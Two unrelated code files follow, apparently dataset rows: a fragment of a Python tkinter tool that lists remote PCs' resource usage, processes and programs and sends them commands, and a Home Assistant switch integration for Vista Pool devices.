            "Загрузка памяти", client_pc["ram_usage"]))
        table_propertys.insert("", END, values=(
            "Загрузка диска", client_pc["disk_usage"]))
        # Processes.
        for process in client_pc["processes"]:
            table_processes.insert("", END, values=(process))
        # Services.
        for servise in client_pc["services"]:
            table_services.insert("", END, values=(servise))
        # Installed programs.
        for program in client_pc["programs"]:
            table_programs.insert("", END, values=(program))
        # Mark this PC's data as consumed until the next update arrives.
        updated.update({pc_name: False})
    database_get_pc()
def thread_name_select(event):
    """Run name_select in a background daemon thread so the UI stays responsive."""
    worker = Thread(target=name_select, args=[event], daemon=True)
    worker.start()
def thread_get_names_list():
    """Refresh the global names_list by scanning ip_addresses, then refill the UI."""
    global names_list
    # NOTE(review): this Lock is created locally on every call, so it cannot
    # actually serialize concurrent invocations -- confirm whether a shared
    # module-level lock was intended.
    lock = Lock()
    lock.acquire()
    try:
        names_list = get_names_list(ip_addresses)
        # Only touch the widgets when the scan actually found PCs.
        if len(names_list) != 0:
            clear_listbox(computer_list)
            fill_listbox(computer_list, names_list)
            fill_tables()
    finally:
        lock.release()
    print(f"Names PC in my network {len(names_list)}: {str(names_list)}")
def thread_send_command(command, table):
    """Send a command to the remote PC on a background daemon thread.

    Bug fixes: the original passed target=send_command(command, table),
    which called send_command synchronously and handed its result to
    Thread; and referenced lock.acquire without calling it. The command is
    now genuinely dispatched on the worker thread. The per-call Lock is
    dropped: a lock created locally on every call can never be contended.
    """
    thread_send = Thread(target=send_command, args=(command, table), daemon=True)
    thread_send.start()
|
"""Support for Vista Pool switches"""
import logging
from homeassistant.helpers.entity import ToggleEntity
from homeassistant.const import CONF_USERNAME
from .vistapool_entity import VistaPoolEntity
from .const import DOMAIN
_LOGGER = logging.getLogger(__name__)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
    """Old way of setting up the platform; intentionally a no-op (see async_setup_entry)."""
async def async_setup_entry(hass, config_entry, async_add_entities):
    """Set up Vista Pool switch entities from a config entry."""
    account = config_entry.data.get(CONF_USERNAME)
    vistaPoolData = hass.data[DOMAIN][account]
    # One entity per configured switch of every pool on this account.
    entities = [
        VistaPoolSwitch(config_pool, switch)
        for config_pool in vistaPoolData.config_pools
        for switch in config_pool.switches
    ]
    async_add_entities(entities)
class VistaPoolSwitch(VistaPoolEntity, ToggleEntity):
    """Representation of a Vista Pool switch.

    Thin ToggleEntity wrapper that delegates state and on/off commands to
    self._instrument -- presumably assigned by VistaPoolEntity.__init__;
    confirm against vistapool_entity.py.
    """

    @property
    def is_on(self):
        """Return true if switch is on."""
        return self._instrument.state

    async def async_turn_on(self, **kwargs):
        """Turn the switch on."""
        await self._instrument.turn_on()

    async def async_turn_off(self, **kwargs):
        """Turn the switch off."""
        await self._instrument.turn_off()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.